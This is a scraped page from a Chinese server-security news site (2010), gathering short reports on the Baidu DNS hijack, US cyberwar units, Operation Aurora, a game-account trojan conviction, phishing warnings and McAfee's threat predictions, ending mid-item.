服务器安全维护网 berlin@serversteam.com 10 http://www.serversteam.com/S/News/news-20100204700.html 说到2010年开年中国互联网开年大事，少不了两大搜索引擎巨擘。1月12日百度网站被黑，至于被黑原因众说纷纭，仍未有确切答案。次日，谷歌宣布退出中国市场，消息一出，百度、谷歌立刻成 　　说到2010年开年中国互联网开年大事，少不了两大搜索引擎巨擘。1月12日百度网站被黑，至于被黑原因众说纷纭，仍未有确切答案。次日，谷歌宣布退出中国市场，消息一出，百度、谷歌立刻成为网民时刻关注的话题。继百度、谷歌受攻击之后，最近网络流行的终极爱情密码游戏推出品牌CC卡美网站再度被黑，互联网安全性已经成为了一个急需解决的话题。 1月12日早7点左右，就有网友发现百度网页打不开，一直到10点后才陆续恢复正常。此次百度遭到史无前例的黑客攻击，长时间无法正常访问。这是自百度建立以来，所遭遇的持续时间最长、影响最严重的黑客攻击。另外，1月13日另一搜索巨头谷歌宣布要退出中国市场，可谓是一波未平一波又起。 除了上述两大网络巨擘都受到重创外，记者还接到网友反映，1月29日晚上23点半到次日凌晨1点期间再次受到攻击，CC卡美官方网站之前在1月 22日网上就因同时在线人数太多而出现瘫痪局面。据记者了解，该活动是一项需要网友参与的网络互动活动，参加活动的主要信息和互动来源均来自被黑的活动页面。并且网页被黑的时间，正好是该活动“终极爱情密码”线索五公布的时间点。 在这一事件的调查中，记者与该活动的主办方取得了联系，活动负责人说，该网页确实是被黑客攻击。29日晚23点半左右，工作人员发现官方网站的 “终极爱情密码”活动页面出现异常乱码。同时，等待参与活动的网友纷纷留言至CC卡美在新浪的博客上面，不到一个小时，博客点击达3000余次，留言达 100多条。网友表示，为了及时获得新的游戏线索，提前半个小时守候在官网的活动页面，但等到了却是乱码。 活动负责人向记者澄清，对于这次活动出现的临时状况，还请广大网友予以谅解。网页被黑的原因还在进一步的调查中。网页被黑，不排除是某些热衷于活动的网络高手为了提前获得线索而动的手脚。同时，也希望广大网友放心，这个活动是公开公平的，不会因为某些突发事件而改变，想要赢得大奖还需及时破解线索。鉴于网友是由于参与活动而并没有危害性，故不打算追究网友的责任。 从百度被黑到网络火爆活动相继被黑这些事件看来，网络安全令人担忧。工信部发言人日前表示：中国政府始终坚决反对任何形式的网络攻击行为，对打击网络攻击等犯罪行为作出了明确规定。记者也在这里呼吁大家，一定要遵纪守法，净化网络环境，维护公共互联网网络安全。 百度,被黑,CC卡美,中国,互联网,安全 行业资讯 admin 未知 2010-02-04 10:12 http://www.serversteam.com/S/News/news-20100204699.html DNS价值几何？百度被黑敲响安全警钟! 谁来挽救脆弱的DNS? 日前，因为DNS解析的脆弱性，黑客频频利用互联网的这个软肋，制造了一次次灾难性事故。2009年5月19日，暴风影音事件中，DNS体系的脆 DNS价值几何？百度被黑敲响安全警钟! 　　谁来挽救脆弱的DNS? 日前，因为DNS解析的脆弱性，黑客频频利用互联网的这个软肋，制造了一次次灾难性事故。2009年5月19日，暴风影音事件中，DNS体系的脆弱性已经初见端倪：仅仅因DNSpod这样一个小环节被攻击，连锁导致了江苏、河北、山西、广西、浙江等十几个省份出现大规模网络故障。 2010年1月12日上午，百度遭到黑客攻击，造成百度首页大面积长时间无法访问，百度CEO李彦宏连称“史无前例，史无前例呀”。百度首页长时间不能被正常访问，其罪魁祸首还是源于DNS体系的脆弱性。 2010年1月20日广东某IDC发生DNS故障,官方称遭网络攻击。 在互联网高速发展的今天，有着先进的电信设备和高尖端的安全技术，为什么DNS“猝死”还频繁上演？ 站长还会进一步质疑：为什么升级更新系统，新置防火墙，还是阻挡不住黑客死神的步步进逼，是我们用错了技术设备，还是根本无技术设备好用？触目惊心的一次次事故，让我们有必要重新审视和加固我们DNS解析的安全性。 据了解，DNS解析是互联网访问中重要而又不可或缺的一个环节。网民在访问网络资源的时候，需要标识服务器的IP地址，但为了记忆的方便，一般用域名的形式访问特定的服务器。任何域名的访问都要翻译成特定的IP地址，网民才能得以访问网页、才能登陆即时聊天工具、才能享受到互联网给我们带来的信息便捷性。 百度DNS事故带给站长哪些反思？ 我们知道此次事故是因为百度在美国域名服务商注册的域名，黑客获取了操作baidu.com ns记录的权限，将baidu.com的ns记录先后错误指向了三次。被指向的DNS服务器根本不知晓www.baidu.com的正确解析，甚至没有授权解析baidu.com的任何域名.根据DNS解析规范，任何来访的DNS解析请求，都会得到一个答案--- “没有这个解析”. 这个假消息在DNS系统里传播，导致所有的百度网民不能够正确的访问百度首页。我们大致可以总结出下面几个经验教训： a:审查代理商的安全操作机制。代理商的操作权限和登录终端必须严格控制，避免不法分子的危险操作； b:域名的备份机制。客户在维护主域名的同时，应该维护备份域名。在出现故障时，及时提示用备份域名进行访问，以便引导网民正常的访问客户的业务。 c:代理商的备份机制。尽量不要将业务放在一个篮子里，同时注册多家代理商，考核其运营机制和沟通是否有效，在灾难发生时能及时有效的进行沟通，修正任何非法篡改。 d:减小域名的缓存时间。缓存时间越长，对于解析时间在整个访问过程中所占的比重越小，访问效率越高，但是对于错误的域名，其污染时间就会越长；我们要在安全性和访问效率上寻求一个平衡点。 e:与各级电信运营商建立良好沟通的渠道。在域名解析的错误修正后，能够及时的将缓存清除掉，重新获取一份纯洁的解析记录。 　　DNS脆弱体系带来的行业契机 每一次DNS解析的事故，都给我们带来血淋淋的教训，也让我们更加重视DNS的安全性和稳定性。 笔者走访了中国CDN业界的领军人物蓝汛，承担维护上万台设备的DNS解析指向，每天承担着上亿次的解析重担。技术负责人告诉笔者，只有将DNS安全防范放在平时，才能为客户提供稳定、可靠和安全的DNS服务。 　　给DNS穿上坚不可摧的盔甲 获悉，蓝讯ChinaCache充分意识到DNS解析的重要性，申请多重业务域名，将客户的业务均匀分布在各个域名中，将风险降到最低。给客户做好备份域名的热备份，并与全国电信运营商保持紧密合作关系，在出现域名污染时，能够及时联系故障发生当地的电信运行商，及早消除故障的负面影响。同时，蓝汛严格遵守业务操作规范，对于业务的操作权限和登录终端进行严格限制。蓝讯还独创性的开发出具有自主知识产权的解析验证系统，自动绕过全球 LDNS的缓存，实时直接监控DNS解析的正确性。一旦发生任何异常，将自动给出错误诊断报告，以便采取应急措施。该系统一经推出，深受工行等金融安全行业客户的青睐。 　　专家呼吁加强DNS安全意识 百度等知名互联网企业遭受域名劫持，使普通用户上网安全更难保障，黑客极容易将木马等恶意程序植入。DNS基础运营商、站长除了日常做好服务器基础安全漏洞的跟进和修复外，更需提高互联网安全意识。 业内人士指出：百度作为全球最大中文搜索网站，却遭受多次被黑事件，且这次故障恢复时间长达5小时，折射出百度对安全技术投入和应急准备明显不足。DNS解析是互联网访问中重要而又脆弱的一个环节，破坏者越来越善于利用DNS体系的脆弱，给我们站长带来一次次沉重的打击，很多公司已经开始选择将DNS服务器的维护交给一些专业公司所解决，比如中国工商银行就将DNS解析和加速安全的维护工作交给了蓝讯ChinaCache。随着DNS技术不断发展，包括IPv6、DNSSEC等新技术和新标准的适用，各DNS软件厂商和CDN运营商，也在不断地推出更多更安全的DNS产品。我们坚信，DNS体系会愈发健壮。 百度,被黑,警钟,脆弱,DNS安全 行业资讯 admin 未知 2010-02-04 10:11 http://www.serversteam.com/S/News/news-20100204698.html 美国国防部副部长林恩近日在接受《时代》周刊采访时宣称，很多国家正在通过网络战争的形式缩小其与美军常规力量的差距。林恩认为，美国的金融系统、通信和其他电子基础设施，都可能 美国国防部副部长林恩近日在接受《时代》周刊采访时宣称，很多国家正在通过“网络战争”的形式缩小其与美军常规力量的差距。林恩认为，美国的金融系统、通信和其他电子基础设施，都可能成为敌国黑客偷袭的对象。他透露，美国境内的计算机系统正在遭遇“史无前例”的黑客活动袭扰。 其实，美国人自己也在不断强化网络战的能力。其中最重要的一点，就是美军正在尝试通过黑客的秘密活动，让敌国相信，它们仍在控制着自己的武装力量，而实际上，这些武装力量已经处在美军的掌握之中。美国新近组建的“网络战司令部”进一步说明，网络战已经成为五角大楼旗下的重要兵种。 根据美军参谋长联席会议制定的规划，为了美国要有彻底摧毁敌方计算机系统的能力。美国空军则宣称，希望能具备“隐身”打入世界各国电脑系统潜伏数年不被发现的能力。美方网络战的目标是，坐在五角大楼，敲打键盘，遥控敌方电脑系统。美国陆军和海军也相应地开发了适合兵种特色的网络战软件。 在网络空间内，没有国家界限，防卫一方必须时刻提高警惕，对所有潜在的敌人保持“清醒头脑”。而进攻一方(黑客)，只要抓住一次机会，就可以给对方以沉重地打击。由于黑客不会直接从自己所在地发起攻势，而是要借助多个服务器来进行“接力”，因此追查黑客来源的努力几乎都以失败告终。 美国承认，一旦自己的电脑系统遭到敌方黑客袭击，那么此时再采取任何反击措施都“为时已晚”。此刻，美国必须想办法激活隐藏在敌方电脑系统中的黑客代码，从而实现反击之目的。对网络战来说，“从敌人内部瓦解对手”，永远是最有效的办法。此前，美国曾在伊拉克战争中小试网络战牛刀，并且取得了良好的战果。 1993年，美国国防大学率先成立了旨在培养信息战人才的信息资源管理学院，首批16名学员被称为第一代计算机网络战士，他们的任务就是利用计算机在赛博空间与敌人展开全面信息对抗。这支部队旨在让士兵坐在电脑前轻松敲打键盘、点击鼠标，就让敌方雷达系统失灵，通讯电力系统中断，无法调动部队，只能被动挨打。 美军网络战司令部归美军战略司令部管辖，于2009年10月开始局部运作，到2010年10月开始全面运作。该司令部对目前分散在美国各军种中的网络战指挥机构进行整合。此举标志着世界上拥有最大网络战资源的军队开始把网络战争正式提上议事日程，顺应了信息化时代战争发展的潮流。 美军招募网络战士的基本途径主要有3种：一是刊登广告招募“网络真人”。因为经济衰退，众多一度只去硅谷求职的青年才俊，开始加盟“政府网络黑客”这一队伍。二是每年在赌城拉斯维加斯的全球黑客大赛和不同级别的黑客竞赛中选拔人才。三是对于其他国家举办的黑客大赛，美国军方也积极参与。 虽然美军从未公布过网络部队人数，但据防务专家评估，目前美军共有3000-5000名信息战专家，5 万～7万名士兵涉足网络战。如果加上原有的电子战人员，美军的网战部队人数应该在8.87万人左右。这意味着美军网战部队人数已经相当于7个美军最精锐的 101空降师的兵力。 除了美国以外，日本、韩国、俄罗斯、印度和以色列等国，也纷纷组建了自己的网络战部队。一场不见金戈铁马和硝烟的网络军备竞赛，正在各国之间悄悄展开。(高轶军) 网络,军备,竞赛,美军,黑客,控制,军力 行业资讯 admin 未知 2010-02-04 10:10 http://www.serversteam.com/S/News/news-20100204697.html 2月4日消息，据媒体报道，一位计算机安全专家发现广泛应用的甲骨文软件中存在一些安全漏洞。黑客利用这些安全漏洞能够远程访问企业和政府数据库中的敏感信息。 英国的一家计算机安全 2月4日消息，据媒体报道，一位计算机安全专家发现广泛应用的甲骨文软件中存在一些安全漏洞。黑客利用这些安全漏洞能够远程访问企业和政府数据库中的敏感信息。 英国的一家计算机安全公司NGSSoftware的首席研究科学家David Litchfield说，甲骨文数据库设计中的一个安全漏洞能够让黑客通过互联网突破专用的数据库。 Litchfield星期三在华盛顿举行的黑帽会议上展示了他的研究结果之后说，这个安全漏洞能够让攻击者取得全面的控制权，不需要用户ID和口令。所有的防火墙都不管用。 Litchfield说，他在去年11月警告了甲骨文这个安全漏洞，希望甲骨文在今年1月发布的每季度安全补丁中修复这个安全漏洞。但是，甲骨文没有这样做。因此，他决定公开这个安全漏洞。 甲骨文官员不愿意对这个事情发表评论。 Litchfield说，他认为每10个甲骨文数据库大约有9个容易受到攻击。他说，改变甲骨文软件默认的设置可能会阻止黑客利用这个安全漏洞。 他说，现在不可能说黑客是否已经实际利用这个安全漏洞非法突破甲骨文的数据库。 甲骨文,数据库,漏洞,黑客 行业资讯 admin 未知 2010-02-04 10:10 http://www.serversteam.com/S/News/news-20100204696.html 资料图：美国情报机构是炮制中国间谍案的推手之一。图为联邦调查局总部大楼 环球网实习记者谭利娅报道 据2月3日美联社消息，美国国家情报总监丹尼斯?布莱尔称，中国加强对美间谍活动。 资料图：美国情报机构是炮制“中国间谍案”的推手之一。图为联邦调查局总部大楼 　　环球网实习记者谭利娅报道 据2月3日美联社消息，美国国家情报总监丹尼斯?布莱尔称，中国加强对美间谍活动。 报道说，布莱尔在向国会的书面证明中称，中国在去年加强对美情报收集和处理工作。他还说，中国的情报工作“在美国内外都在不断扩大”。 美国国会的一个咨询委员会也曾在去年11月发表报告称，中国间谍正积极偷取美国机密，以加强北京在军事和经济方面的实力。而针对该委员会的发言，中国驻美国大使馆发言人王宝东当时就对有关说法坚决予以否认，称这些指称“毫无根据、空穴来风、不负责任”。 对于类似新闻频频曝光，中国专家称，美国正想方设法贬低中国的国际成就，打击中国的国家形象。 “这种新闻并不新鲜。” 中国军事专家戴旭曾在接受《环球时报》采访时说，美国抹黑中国的手段无非是所谓的间谍、黑客等老话题。为达到遏制中国的目的，美国想方设法贬低中国的国防成就，打击中国的国家形象。   http://www.serversteam.com/uploads/allimg/100204/100S1A91-0-lp.jpg 美国,间谍,黑客,中国,形象 行业资讯 admin 未知 2010-02-04 10:07 http://www.serversteam.com/S/News/news-20100204695.html 美国新近组建的网络战司令部进一步说明，网络战已经成为五角 大楼旗下的重要兵种。 人民网2月4日电 美国国防部副部长林恩近日在接受《时代》周刊采访时宣称，很多国家正在通过网络战争   美国新近组建的“网络战司令部”进一步说明，网络战已经成为五角 大楼旗下的重要兵种。 　　人民网2月4日电 美国国防部副部长林恩近日在接受《时代》周刊采访时宣称，很多国家正在通过“网络战争”的形式缩小其与美军常规力量的差距。林恩认为，美国的金融系统、通 信和其他电子基础设施，都可能成为敌国黑客偷袭的对象。他透露，美国境内的计算机系统正在遭遇“史无前例”的黑客活动袭扰。 　　其实，美国人自己也在不断强化网络战的能力。其中最重要的一点，就是美军正在尝试通过黑客的秘密活动，让敌国相信，它们仍在控制着自己的武装力 量，而实际上，这些武装力量已经处在美军的掌握之中。美国新近组建的“网络战司令部”进一步说明，网络战已经成为五角大楼旗下的重要兵种。 　　根据美军参谋长联席会议制定的规划，为了美国要有彻底摧毁敌方计算机系统的能力。美国空军则宣称，希望能具备“隐身”打入世界各国电脑系统潜伏 数年不被发现的能力。美方网络战的目标是，坐在五角大楼，敲打键盘，遥控敌方电脑系统。美国陆军和海军也相应地开发了适合兵种特色的网络战软件。 　　在网络空间内，没有国家界限，防卫一方必须时刻提高警惕，对所有潜在的敌人保持“清醒头脑”。而进攻一方(黑客)，只要抓住一次机会，就可以给 对方以沉重地打击。由于黑客不会直接从自己所在地发起攻势，而是要借助多个服务器来进行“接力”，因此追查黑客来源的努力几乎都以失败告终。 　　美国承认，一旦自己的电脑系统遭到敌方黑客袭击，那么此时再采取任何反击措施都“为时已晚”。此刻，美国必须想办法激活隐藏在敌方电脑系统中的 黑客代码，从而实现反击之目的。对网络战来说，“从敌人内部瓦解对手”，永远是最有效的办法。此前，美国曾在伊拉克战争中小试网络战牛刀，并且取得了良好 的战果。 　　1993年， 美国国防大学率先成立了旨在培养信息战人才的信息资源管理学院，首批16名学员被称为第一代计算机网络战士，他们的任务就是利用 计算机在赛博空间与敌人展开全面信息对抗。这支部队旨在让士兵坐在电脑前轻松敲打键盘、点击鼠标，就让敌方雷达系统失灵，通讯电力系统中断，无法调动部 队，只能被动挨打。 　　美军网络战司令部归美军战略司令部管辖，于2009年10月开始局部运作，到2010年10月开始全面运作。该司令部对目前分散在美国各军种中 的网络战指挥机构进行整合。此举标志着世界上拥有最大网络战资源的军队开始把网络战争正式提上议事日程，顺应了信息化时代战争发展的潮流。 　　美军招募网络战士的基本途径主要有3种：一是刊登广告招募“网络真人”。因为经济衰退，众多一度只去硅谷求职的青年才俊，开始加盟“政府网络黑 客”这一队伍。二是每年在赌城拉斯维加斯的全球黑客大赛和不同级别的黑客竞赛中选拔人才。三是对于其他国家举办的黑客大赛，美国军方也积极参与。 　　虽然美军从未公布过网络部队人数，但据防务专家评估，目前美军共有3000-5000名信息战专家，5 万～7万名士兵涉足网络战。如果加上原 有的电子战人员，美军的网战部队人数应该在8.87万人左右。这意味着美军网战部队人数已经相当于7个美军最精锐的 101空降师的兵力。 　　除了美国以外，日本、韩国、俄罗斯、印度和以色列等国，也纷纷组建了自己的网络战部队。一场不见金戈铁马和硝烟的网络军备竞赛，正在各国之间悄 悄展开。(高轶军) http://www.serversteam.com/uploads/allimg/100204/1005103315-0-lp.jpg 美军,秘密,黑客,控制,武装,力量 行业资讯 admin 人民网 2010-02-04 10:04 http://www.serversteam.com/S/News/news-20100204694.html 新华网杭州11月7日电（记者方列）浙江省云和县人民法院11月6日对备受社会关注的以新罪名起诉黑客案作出判决，以非法获取计算机信息系统数据罪判处被告人陶锋有期徒刑1年6个月，缓刑两年 新华网杭州11月7日电（记者方列）浙江省云和县人民法院11月6日对备受社会关注的以新罪名起诉“黑客”案作出判决，以非法获取计算机信息系统数据罪判处被告人陶锋有期徒刑1年6个月，缓刑两年，并处罚金10万元；违法所得18．98万元予以追缴，退赔被害人。 今年2月，云和人陶峰向网民“铁血”（另案处理）购得一套针对“通吃”游戏的木马程序并在互联网上进行传播，先后获取了数百个“通吃”游戏玩家的用户账号、密码等信息并伺机进行操控。 6月20日下午，陶峰在自己的住处上网，通过传播盗号木马获取到网民张某在“通吃”游戏中的用户名及密码等。随后，陶利用对方下线的机会，冒用张某的用户名及密码登录“通吃”游戏系统，将张某此账号内的约60亿“扎啤”（游戏道具）以故意输掉的方式变卖给买家方某（另案处理），从中获利18．98万元人民币。 法院认为，被告人陶锋为谋取经济利益，违反国家有关计算机信息系统安全保护制度，利用木马程序非法获取计算机信息系统数据进行倒卖，造成他人损失33 万元，获利18．98万元，情节严重，其行为已构成非法获取计算机信息系统数据罪。鉴于被告人陶锋归案后的认罪态度较好，且其家属已为其退出赃款，可酌情从轻处罚。据此，法院作出上述判决。 浙江,黑客,游戏,盗号,牟利,判刑 行业资讯 admin 未知 2010-02-04 10:02 http://www.serversteam.com/S/News/news-20100204693.html 近日随网监民警网上巡查发现，网民就算是老油条，也难免被骗。警方提醒，目前网络诈骗主要有网络购物、网上聊天、网络游戏和网络骗色四大手段，市民上网时一定要提高警惕性。 网络购 近日随网监民警网上巡查发现，网民就算是“老油条”，也难免被骗。警方提醒，目前网络诈骗主要有网络购物、网上聊天、网络游戏和网络骗色四大手段，市民上网时一定要提高警惕性。 　　网络购物“鱼龙混杂” 网上购物骗子往往选择大型正规网站，发布一些让人心动的商品，而且价格绝对地便宜。与此同时，再配上天衣无缝的售后服务，让人很难禁得住诱惑。骗子主要是抓住不少人贪图便宜的心理进行诈骗。警方提醒，遇到价格特别便宜的产品也要利用搜索引擎，查询信息里的电话、联系人、公司名等关键字，看看网络上有没有其他网友公布的行骗记录。 　　网上骗局多是聊友作案 随着即时通讯工具的兴起，在虚幻的网络里，人与人的交流不再直接而熟识，而是变得随意而隐蔽。令人警醒的是，九成以上的骗局都是聊友作案。网监人员揭秘，多数网民并不知道网上存在着许多伺机作案的诈骗分子，目前对我们影响最大的当属时下比较流行的MSN等。许多网民在被骗后仍然警惕性不高，所以才导致大面积的网民受害，甚至在现实中影响亲友一起受骗。 　　网络游戏骗局不少 网络游戏世界的精彩让人流连忘返，其中也有不少骗局。网监人员介绍，多数网游本身就以骗钱为目的，虚拟世界几乎没有什么健康益智的免费游戏，即使有也是引诱网民付费继续玩游戏。网络游戏中的骗子往往利用玩家大意、急于获得道具或者贪小便宜等心理进行欺诈，更有些人甚至动用黑客手段进行些作案。受骗玩家通常安全意识较低，太容易相信别人，在进行交易时过于心急。所以建议玩家进行交易时都留个心眼，不要急于交易，多问对方几个问题，不要贪小便宜。 　　网络骗色难以界定 网络骗色与单纯的诈骗不尽相同，这类“色狼”一般是以对方的身体为目的，有文化、智商较高，同时他们一般都会诱骗对方，让对方在非强迫下与自己发生关系，因此在法律上也很难界定。但是这样的行为甚至会令一方家庭分裂，严重影响家庭感情。此外，色情诱惑一般还带有骗财目的。由于人性的本能问题，无论是男性还是女性都会有经受不住色情诱惑的可能，一旦受骗，受害者往往都会吃哑巴亏。 网监人员表示，如果网民自己没有弱点，网络骗子不过是“纸老虎”。因此，网络上不要轻易相信任何人。 网络,骗术,黑客,作案 行业资讯 admin 未知 2010-02-04 10:00 http://www.serversteam.com/S/News/news-20100204692.html 每年的春节长假都是病毒的高发期，这些病毒利用人们过年互发祝福、对病毒疏于防范而趁机作案。 电脑反病毒专家指出，春节期间网民在家上网最容易遭遇三大网络陷阱： 其一是盗号类病毒 “每年的春节长假都是病毒的高发期，这些病毒利用人们过年互发祝福、对病毒疏于防范而趁机作案。 ”电脑反病毒专家指出，春节期间网民在家上网最容易遭遇三大网络陷阱： 其一是盗号类病毒。春节长假是网上购物高峰期，“网银大盗”、“证券大盗”等专门盗 取网上银行账号、网上证券交易账号以及各种游戏、邮箱、MSN、QQ密码的木马病毒都有可能发作。也可能利用新春祝福、拜年贺卡的形式发送染毒邮件进行传 播，用户一旦打开邮件，立刻中招。 其次是钓鱼网站。很多消费者春节期间会通过网络为朋友选购礼物，一些不法分子则趁机 采用伪造的购物网站或假网络银行页面来盗取上网用户重要个人信息（如财务数据、银行信用卡号、网游账号等）。 此外是打折优惠陷阱。春节期间，一些中奖赠送信息、优惠打折机票等邮件信息刺人眼球 勾人“上道”，骗取用户个人信息和密码，进而算计你的银行卡。 因此，不要随意点击或运行来历不明的链接或文件，即便是好友发来的新春祝福图片或链 接也要在确认后再打开。春节期间上网购物时，一定要选择那些可靠的大型购物网站，以免误入网上骗子设下的圈套。 黑客,节庆,狂欢,春节,网络陷阱 行业资讯 admin 未知 2010-02-04 09:58 http://www.serversteam.com/S/News/news-20100204691.html 2月3日电 据外电2日报道，美国一家名为Trusteer的公司日前警告网络使用者，不要在不同的网络站点使用同一信息和密码。 根据该公司最新的一项调查结果显示，73%的网络访问者使用同一个密码 2月3日电 据外电2日报道，美国一家名为Trusteer的公司日前警告网络使用者，不要在不同的网络站点使用同一信息和密码。 　　根据该公司最新的一项调查结果显示，73%的网络访问者使用同一个密码在网上银行和其他多个网络站点注册个人信息，而超过一半的受访者表示他们 使用同一用户名和密码注册和享受网络金融和现金服务。 　　该公司技术部的首席执行官阿米特•克莱茵表示，如此多的人在不同的网站上使用相同的个人信息，这让他们极易暴露在网络黑客面前，给了这些不法分 子获取不义之财的机会。 　　报道称，如果消费者在多个站点使用同一密码，黑客们的行动就变得轻而易举，他们可以通过获取消费者在当地零售店输入的个人信息来获取缓存的密 码，并随后将目标直指消费者在一些大的银行和金融机构的账户。 　　同时，密码的重叠让银行和金融机构煞费苦心建立起的安全系统形同虚设，黑客们可以通过那些防御性较弱的网站来获取个人信息，然后再登录到银行的 网络账户中。 　　近年来，网络安全专家一直警告消费者不要在不同的网络站点使用同一密码或者相同的个人信息。但很显然，许多人忽视了这一建议。 　　目前，网络运营商和相关金融机构正设法研制新的网络安全技术以防止更多的黑客通过网络平台或许客户信息。 调查,消费者,账户,密码,黑客 行业资讯 admin 未知 2010-02-04 09:58 http://www.serversteam.com/S/News/news-20100204690.html 随着iPad开始风靡全球，消费者越来越渴望获取更多的有关苹果（Apple）新创意产品的信息。而这正给网络犯罪分子提供了绝佳的机会，借此制造恶意链接。当iPad发布时，赛门铁克就观察到有关 随着iPad开始风靡全球，消费者越来越渴望获取更多的有关苹果（Apple）新创意产品的信息。而这正给网络犯罪分子提供了绝佳的机会，借此制造恶意链接。当iPad发布时，赛门铁克就观察到有关搜索词已经成为了黑帽 SEO攻击（用垃圾技术欺骗搜索引擎）和钓鱼攻击的目标。赛门铁克提醒iPad爱好者，当您在互联网上搜索iPad信息时，一定要当心黑客。 人们对iPad的热衷已经持续数月，本以为新品发布只是会引发某些特定词条的搜索热潮，但没想到网络黑客却利用这个机会开始制造攻击，频频“污染” （poison）搜索词条。据赛门铁克估计，今后数周内，消费者将遇到披着iPad“外衣”的垃圾邮件和钓鱼网站的猛烈攻击。赛门铁克建议iPad爱好者一定要小心谨慎。 同时，赛门铁克为用户提供以下安全建议： ?不要点击电子邮件或即时信息中的可疑链接，因为它们可能链接到欺诈网站上。 ?应在浏览器中直接键入网站地址，而不是直接点击信息中的链接。 ?如果一封电子邮件的报价便宜得离谱，那它很可能就是假的。一定要向经授权的或知名的供应商或信息源查询信息。 ?务必确保您的操作系统打了最新的升级补丁，并使用了完备的安全套件。 ?删除所有垃圾邮件。 赛门铁克,安全,公告,iPad,黑客 行业资讯 admin 未知 2010-02-04 09:52 http://www.serversteam.com/S/News/news-20100204689.html 北京时间2月3日消息，微软IE漏洞被黑客利用对Google展开攻击，有1万多个网站受害，微软虽然在两周前提前发布更新程序。不过，专家2日指出，在微软未修补的期间，确实已造成灾情，有不少 北京时间2月3日消息，微软IE漏洞被黑客利用对Google展开攻击，有1万多个网站受害，微软虽然在两周前提前发布更新程序。不过，专家2日指出，在微软未修补的期间，确实已造成灾情，有不少人可能已被漏洞影响遭植入木马程序。 Google此次遭受袭击是近几年来看到的规模最大、最复杂的、以特定公司为目标的网络攻击，名为极光行动（Operation Aurora），黑客在行动中使用最新的技术来欺骗使用者点击网站连结，然后加载恶意代码的链接使计算机自动下载恶意软件。攻击程序代码除了利用新型态浏览器漏洞外，并且可使用各种加密编码方式进行混淆，这是是网络安全领域的一个分水岭，这次袭击行动改变了世界。 数据显示，这一波受黑数量在21日达到高峰，但是在微软1月22日紧急提前发布修补程序之后，数量有下降的趋势；但资安威胁主动侦测系统却发现恶意网站的数量并未明显地下降，仍是维持固定规模，代表网络上仍散布着不少恶意网站。 专家说，这种俗称“网页挂马”的入侵手法，近几年来成为黑客入侵计算机最爱的方式，严重影响上网浏览用户的安全，而这起微软浏览器漏洞正是网页挂马最爱使用的攻击漏洞。 因此建议用户务必对该漏洞进行更新，避免遭到该攻击影响。 微软,IE,漏洞,黑客 行业资讯 admin 未知 2010-02-04 09:49 http://www.serversteam.com/S/News/news-20100204688.html 热心站长老陈报料，国内知名的社区与服务提供商康盛创想公司旗下的Discuz！官方社区在今天下午14：30分左右无法访问，原因暂时不明。 无法Ping通Discuz 随后中国站长站编辑联系了康盛创想工 热心站长老陈报料，国内知名的社区与服务提供商康盛创想公司旗下的Discuz！官方社区在今天下午14：30分左右无法访问，原因暂时不明。 无法Ping通Discuz 　　随后中国站长站编辑联系了康盛创想工作人员温先生，温先生表示，官方论坛确实遭到了不明攻击，但随即做出了相应的处理，并且也恢复了正常访问， 在其官方论坛的在线列表可以清楚看到被攻击后的痕迹。 　　不过在处理CC攻击的同时，有部分地区的IP因为在攻击范围内而被屏蔽，因此有一部分站长仍然无法打开Discuz官方论坛。 　　目前Discuz正在陆续解封一些被屏蔽的IP。 http://www.serversteam.com/uploads/allimg/100204/094Z452C-0-lp.jpg Discuz!,官方,访问,黑客,CC攻击 行业资讯 admin 未知 2010-02-04 09:23 http://www.serversteam.com/S/News/news-20100204687.html 广州南山公安分局昨日通报，该局高新派出所近日在深圳市公安局网络警察支队的协助下，千里奔赴河南郑州，一举破获利用黑客手段传播淫秽色情网站非法牟利案件，并抓获犯罪嫌疑人员一 广州南山公安分局昨日通报，该局高新派出所近日在深圳市公安局网络警察支队的协助下，千里奔赴河南郑州，一举破获利用黑客手段传播淫秽色情网站非法牟利案件，并抓获犯罪嫌疑人员一名。 上海某知名科技公司深圳分公司法人代表委托人日前向警方报案，称有人非法入侵其公司客户服务器，将一色情网站网址绑定到该公司服务器系统内，致使该公司网站无法正常访问，当登录该公司网站时，自动打开淫秽色情网站，造成公司网络瘫痪，损失巨大。市公安局接报后，迅速委派网警支队联合南山分局成立专案组。 经过对案情进行仔细研判，警方发现重要线索——该黑客信息发自河南郑州。1月13日中午，由南山公安分局和网警支队共同组成的专案组民警，奔赴河南省郑州市，一举抓获了利用黑客手段传播淫秽色情网站非法牟利嫌疑人员俊某。 目前，嫌疑人员俊某已被南山警方依法刑事拘留，此案仍在进一步的调查审理和追逃中。 嫌疑,黑客,淫秽,色情,牟利,落网 行业资讯 admin 未知 2010-02-04 09:21 http://www.serversteam.com/S/News/news-20100204686.html 2010 年 2 月2日，迈克菲（McAfee）公司近日公布了2010 年威胁预测报告。迈克菲实验室认为，网络犯罪分子将目标锁定社交网站以及第三方应用程序，他们利用日益复杂的木马病毒和僵尸网络来生 2010 年 2 月2日，迈克菲（McAfee）公司近日公布了2010 年威胁预测报告。迈克菲实验室认为，网络犯罪分子将目标锁定社交网站以及第三方应用程序，他们利用日益复杂的木马病毒和僵尸网络来生成并执行攻击，并且利用HTML 5创建新兴威胁。迈克菲实验室还预测，2010年将是执法打击网络犯罪的良机。 迈克菲实验室高级副总裁Jeff Green表示：“过去10年，我们在成功监测、披露并制止网络犯罪方面取得了长足的进步。现在，我们面临的是呈爆炸式增长的社交网站所带来的新兴攻击、被网络犯罪分子所利用的流行应用程序和更先进的技术，但是，我们坚信，2010年将是网络安全领域大获成功的一年。” 迈克菲实验室2010年威胁预测： 社交网络将成为新兴威胁的温床 Facebook、Twitter，以及这些网站上的第三方应用程序使犯罪分子的作案工具发生了迅速变化，并为犯罪分子提供了他们得以利用的新技术和热点活动。用户将会更容易受到攻击，他们的网络上随机分布着恶意应用程序，这样，网络犯罪分子将利用朋友之间的信任，诱使用户点击那些本应该谨慎对待的链接。在Twitter这样的网站上使用缩略网址将使网络犯罪分子更容易掩盖恶意网址并将用户引向这些网址。迈克菲实验室预测，2010年，越来越多的网络犯罪分子将在最流行的社交网站上利用此类手法。 互联网的演进将使网络犯罪分子获得新机会来编写恶意软件 谷歌Chrome操作系统的发布以及HTML 5的技术改进将使用户的活动从桌面转向在线应用程序，这就为那些恶意软件编写者创造了另一个机会来觊觎用户。预期的HTML 5跨平台支持也为网络攻击者提供了更多机会，使其能够将罪恶之手伸向诸多主流浏览器用户。 由银行木马、电子邮件附件带来的恶意软件将会越来越多、越来越复杂 